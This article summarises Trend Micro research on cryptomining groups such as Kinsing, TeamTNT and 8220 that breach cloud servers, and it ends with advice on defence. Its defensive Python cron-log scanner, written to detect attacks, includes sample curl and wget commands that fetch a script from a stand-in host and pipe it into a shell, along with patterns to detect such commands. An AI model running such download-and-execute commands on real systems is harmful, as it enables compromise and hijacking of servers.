Cryptomining at Someone Else’s Expense: How Hacker Groups Breach Cloud Services
The “gold rush” era of cryptocurrency is long over, and cybercriminals have adapted accordingly. Today, mining cryptocurrency with malware is only profitable at a very large scale, so virus writers are constantly looking for ways to expand their operations and increase profits. Trend Micro conducted a study on the activities of such groups and shared their preliminary findings.
Why Are Cryptominers Dangerous?
Mining cryptocurrency is much less profitable than stealing confidential information or spreading ransomware. As a result, cybercriminals now target cloud services rather than end-user machines. The most popular cryptocurrency among attackers is Monero (XMR), as it offers the highest returns when mined using CPUs, which is important since most cloud services do not provide access to GPUs. This makes the regular processor the only available mining tool.
Hacker groups actively compete with each other for resources, and security experts compare this battle to Capture the Flag cyber tournaments. In their research, Trend Micro analyzed the activities of the most active groups attacking cloud services: Outlaw, TeamTNT, Kinsing, 8220, and Kek Security.
Migrating infrastructure to the cloud is a clear trend in recent years, as it allows companies to save significantly on hardware and maintenance. However, deploying cloud services requires investment in configuration and administration, especially to ensure security. Many companies cut corners here. While many system administrators are familiar with tools for protecting local infrastructure, such as firewalls and antivirus software, they often lack the knowledge and experience needed for cloud services. If monitoring and logging tools are not properly set up in the cloud, administrators may not receive the same level of information as they do with local systems, making it easier to miss an attack. The result is often a breach, and using a compromised cloud for cryptomining is sometimes the least of the possible problems.
Since many cloud services have standardized configurations and default settings that are well-documented and not secret, attackers don’t need to spend much effort on reconnaissance or use sophisticated tools. While it may seem that a cryptominer Trojan in a cloud system is not a serious threat since it doesn’t cause data leaks or infrastructure damage, it can slow down services, cause customer dissatisfaction and churn, and ultimately reduce profits. If a system is vulnerable, attackers can also exploit it for more destructive purposes.
For research purposes, Trend Micro specialists installed the Monero mining program XMRig on a test cloud server that was also running other tasks. They observed CPU usage rising from 13% to 100%. In monetary terms, this increased the server’s monthly rental cost from $20 to $130. Network traffic also increased, but these costs were minor compared to the overall expenses.
Often, access to a compromised cloud server is put up for sale by attackers, and a miner is uploaded temporarily while waiting for a buyer. Detecting such a Trojan is a very bad sign—it’s often the last chance to address security issues before hackers use the compromised server for more malicious purposes.
Hacking Techniques and Hacker Groups
Typically, cybercriminals gain access to cloud infrastructure via SSH by exploiting default settings, known vulnerabilities, or easily guessed passwords through brute force. They then install XMRig, which connects to a mining pool.
Outlaw
Trend Micro began tracking the Outlaw group in November 2018. The group’s name comes from the English translation of their main tool’s Romanian name, “haiduc.” Initially, Outlaw specialized in hacking IoT devices and Linux servers using known vulnerabilities and SSH brute force. After a breach, they would install the haiduc IRC bot, created with Perl Shellbot, to remotely control the compromised system. The device or server could then be used for Monero mining or DDoS attacks.
Over time, Outlaw’s toolkit has changed little, mainly because cloud security technologies have evolved slowly compared to Windows servers and hosts. Since 2019, Outlaw has started installing scripts on compromised systems to remove miners from competing hacker groups and even earlier versions of their own malware. The group’s command server IP address has changed several times, with the latest in use since 2021, indicating the stability of this criminal business.
The IRC bot used by Outlaw is partly based on the source code of another Perl Shellbot, Kippo, which was used by the Romanian hacker group TEAMUL MaLaSorTe in 2013. Whether Outlaw is connected to TEAMUL MaLaSorTe or simply borrowed their malware code remains unclear.
TeamTNT
TeamTNT came to the attention of cybersecurity experts in 2020. After successfully breaching a server, TeamTNT hackers attempt to steal credentials to compromise other services and expand their reach. They are particularly interested in AWS clouds, from which they steal keys and Ngrok tokens. TeamTNT is also active on social media, with members like Hilde and Hildegard running Twitter accounts where they comment on research into their attacks and clarify which incidents are not related to their group.
TeamTNT often targets servers and hosts previously compromised by competitors, especially the Kinsing group. After infiltrating a system, they leave not only miners but also messages for administrators, offering to help fix the vulnerabilities that led to the breach.
Researchers believe that despite this “Robin Hood” approach, TeamTNT is more dangerous than other groups because they don’t just install miners—they also try to compromise all services running under the hacked account (databases, websites, cloud applications) and sometimes block legitimate user accounts. They have also been observed installing rootkits to hide miners in infected systems. Although TeamTNT announced they were ceasing operations, security experts doubt the truth of this claim.
Kinsing
Kinsing has been active since 2021. After gaining access to a cloud server, Kinsing hackers install the XMRig miner, remove malware from other groups, and add a cron job to download and install a shell script for system control. This activity was easy to identify through cron logs, as the hackers either didn’t know how to cover their tracks or didn’t care.
Recently, Kinsing changed tactics. They combined previously used shell scripts into one, with a dynamically generated name. Malicious cron jobs can now be launched from different directories with different filenames. Kinsing also learned to clean up after themselves, deleting traces of malware installation from logs. They use an up-to-date set of exploits, regularly updated to stay current. Trend Micro noted several incidents where 8220 hackers broke into a host already compromised by Kinsing, but Kinsing quickly removed their competitors’ miners without interrupting their own mining process.
8220
This group has been especially active over the past year, using the latest cloud service vulnerabilities. One of their main targets is Oracle WebLogic Server. 8220 hackers exploit vulnerable WebLogic servers, then deploy XMRig and Tsunami (a Trojan for scanning and DDoS attacks). To maintain persistence, they set up cron jobs.
Researchers note that 8220 and Kinsing are in fierce competition for vulnerable servers, removing each other’s malware from compromised systems. Unlike TeamTNT, 8220 and Kinsing are not active on underground forums or social media, possibly because they prefer to stay under the radar.
Kek Security
In January 2021, Imperva researchers published a report on a new botnet using a Python-based IRC bot called Necro. This bot is similar to Outlaw’s haiduc and can be used for cryptomining and DDoS attacks. The group behind Necro is Kek Security, which quickly integrates new exploits and constantly updates its malware.
In addition to cloud services and Linux servers, Kek Security also attacks Windows hosts, thanks to their extensive arsenal. Their toolkit includes exploits for:
- CVE-2020-14882: RCE vulnerability in Oracle WebLogic Server
- CVE-2020-28188: TerraMaster TOS RCE
- CVE-2021-3007: Zend Framework RCE
- CVE-2020-7961: RCE via JSON Web Services for Liferay Portal
- CVE-2021-21972: RCE for VMware vCenter Server
- CVE-2021-29003: RCE in Genexis Platinum 4410 2.1 P4410-V2-1.28
A comment in the Python code of an early version of Kek Security’s bot allowed researchers to identify the likely author’s pseudonym, previously linked to other malware, including IoT Trojans. The author later began creating and launching their own botnets.
Kek Security’s software is continuously updated and improved. Recent versions of their bot are obfuscated using a custom Python obfuscator.
Cloud Battles
The near-total lack of proper protection on vulnerable cloud servers, combined with the fact that attacking groups use almost the same set of exploits, leads to fierce competition. The “cloud battles” between 8220 and Kinsing are just one example. Almost all the hacker groups mentioned use scripts to remove competitors’ software from compromised servers. In effect, these scripts act as primitive antivirus tools.
To counter these scripts, attackers often change the folders and process names used to launch miners. However, over time, “antivirus” scripts are updated, and this advantage is lost. Sometimes the same group acts as both attacker and defender. Kinsing has developed the most advanced protection algorithms: they run the miner in memory, delete their configuration files, and generate six-character file names, with files located in different directories. As a result, when 8220 hackers re-infect a host, they can’t find and remove the Kinsing miner, but Kinsing’s script can successfully remove 8220’s software after the next update.
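The two tells that recur above, cron jobs that fetch and pipe a script into a shell (the Kinsing persistence technique) and six-character random file names dropped into scratch directories, can be checked for from the defender's side. The following Python scanner is an added illustration, not code from the Trend Micro study or from any of the groups; the syslog lines, crontab entries and the 203.0.113.10 address are constructed samples, and the indicator patterns are assumptions about what such entries typically look like.

```python
import re
# Constructed sample input (not real logs); 203.0.113.10 is an RFC 5737 documentation address.
SAMPLE_LINES = """\
Mar  3 04:18:01 web1 CRON[2240]: (root) CMD (curl -fsSL http://203.0.113.10/x.sh | sh)
Mar  3 04:19:01 web1 CRON[2251]: (www-data) CMD (/var/tmp/q7xk2f > /dev/null 2>&1)
Mar  3 04:20:01 web1 CRON[2262]: (root) CMD (cd / && run-parts --report /etc/cron.hourly)
*/10 * * * * wget -q -O- http://203.0.113.10/u.sh | bash
0 3 * * * /usr/bin/certbot renew --quiet
""".splitlines()

# Syslog line written by cron: "CRON[pid]: (user) CMD (command)".
CRON_LOG_RE = re.compile(r"CRON\[\d+\]: \((?P<user>[^)]+)\) CMD \((?P<cmd>.*)\)\s*$")
# Raw crontab entry: five schedule fields (or an @keyword), then the command.
CRONTAB_RE = re.compile(r"^(?:@\w+\s+|(?:\S+\s+){5})(?P<cmd>.+)$")
# Indicators taken from the behaviour described in the text (assumed patterns).
PIPE_TO_SHELL_RE = re.compile(r"\b(?:curl|wget)\b[^|]*\|\s*(?:ba)?sh\b")
WRITABLE_PATH_RE = re.compile(r"(?:/tmp|/var/tmp|/dev/shm)/\S+")
SIX_CHAR_NAME_RE = re.compile(r"^\.?[a-z0-9]{6}$")

def extract_command(line):
    """Return (user, command) for a cron log line or crontab entry, else None."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    m = CRON_LOG_RE.search(line)
    if m:
        return m.group("user"), m.group("cmd")
    m = CRONTAB_RE.match(line)
    return ("crontab", m.group("cmd")) if m else None

def suspicious_reasons(cmd):
    """List the indicators a command matches; an empty list means nothing flagged."""
    reasons = []
    if PIPE_TO_SHELL_RE.search(cmd):
        reasons.append("download piped to shell")
    for path in WRITABLE_PATH_RE.findall(cmd):
        reasons.append("runs from world-writable dir: " + path)
        name = path.rstrip("/").rsplit("/", 1)[-1]
        if SIX_CHAR_NAME_RE.match(name):
            reasons.append("six-character random-looking name: " + name)
    return reasons

def scan_lines(lines):
    """Return one finding per line that matches at least one indicator."""
    findings = []
    for user, cmd in filter(None, map(extract_command, lines)):
        reasons = suspicious_reasons(cmd)
        if reasons:
            findings.append({"user": user, "cmd": cmd, "reasons": reasons})
    return findings
```

Run it over `/var/log/syslog` (or `journalctl -t CRON`) and the output of `crontab -l` for each user; the benign `run-parts` and `certbot` lines in the sample produce no finding, while the three others do.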
While these two groups battle it out, Outlaw avoids them, targeting other systems but also using tools to remove competing miners. Kek Security also has such tools but rarely engages in direct confrontation. TeamTNT, on the other hand, not only removes other hackers’ software but also offers services to secure compromised systems against vulnerabilities, sometimes reaching out to other groups via Twitter.
Conclusion
The most active miner-spreading groups in 2021 were Kinsing and 8220, though the others are also active.
To protect against such attacks, information security experts recommend, first, installing all current software updates promptly, and second, ensuring that only necessary services are running on cloud servers. Most vulnerabilities exploited by hacker groups are found in outdated software, so timely updates can close these security gaps. However, even with all updates installed, attackers can exploit poorly configured services (such as Docker and Kubernetes)—a vector used by TeamTNT. API interfaces should not be accessible from the internet, as this allows attackers to control services. Instead, access should be restricted to administrators and a few users.
Finally, do not leave services running with default settings. It is recommended to use firewalls, intrusion detection and prevention systems (IDS/IPS), and endpoint security products in cloud infrastructure to restrict and filter network traffic. If possible, block domains associated with known mining pools—lists of which are easy to find online.